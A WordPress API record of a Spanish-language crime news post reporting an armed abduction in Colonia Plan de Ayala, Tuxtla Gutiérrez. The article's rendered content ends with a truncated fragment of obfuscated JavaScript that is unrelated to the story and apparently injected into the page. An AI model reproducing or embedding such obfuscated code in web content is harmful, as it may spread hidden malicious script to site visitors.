{"id":20607,"date":"2025-02-26T04:22:29","date_gmt":"2025-02-26T04:22:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20607"},"modified":"2025-02-26T04:22:29","modified_gmt":"2025-02-26T04:22:29","slug":"levantan-a-un-hombre-en-plan-de-ayala","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20607","title":{"rendered":"Levantan&#8221; a un hombre en Plan de Ayala"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"756\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250225-WA0014-1024x756.jpg\" alt=\"\" class=\"wp-image-20608\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250225-WA0014-1024x756.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250225-WA0014-300x221.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250225-WA0014-768x567.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250225-WA0014.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la noche se report\u00f3 a los n\u00fameros de emergencias que un hombre fue privado de su libertad por dos sujetos armados cuando caminaba en la Avenida Chihuahua y Privada Lindavista de la Colonia Plan de Ayala.<\/p>\n\n\n\n<p>De acuerdo con los reportes el hombre de unos 30 a\u00f1os de edad fue interceptado por dos sujetos siendo sometido y subido a una camioneta y llevado con rumbo desconocido.<\/p>\n\n\n\n<p>Al lugar arribaron elementos policiacos para acordonar el \u00e1rea.<\/p>\n\n\n\n<p>En este punto fue encontrado un casquillo percutido.<\/p>\n\n\n\n<p>Se detall\u00f3 que la v\u00edctima vest\u00eda pantal\u00f3n azul, camisa negra y tenis.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de febrero del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la noche se report\u00f3 a los n\u00fameros de emergencias que un hombre fue privado de su libertad por dos sujetos armados cuando caminaba en la Avenida Chihuahua y Privada Lindavista de la Colonia Plan de Ayala. De acuerdo con los reportes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20608,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20607","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20607","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20607"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20607\/revisions"}],"predecessor-version":[{"id":20609,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20607\/revisions\/20609"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20608"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20607"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20607"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20607"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}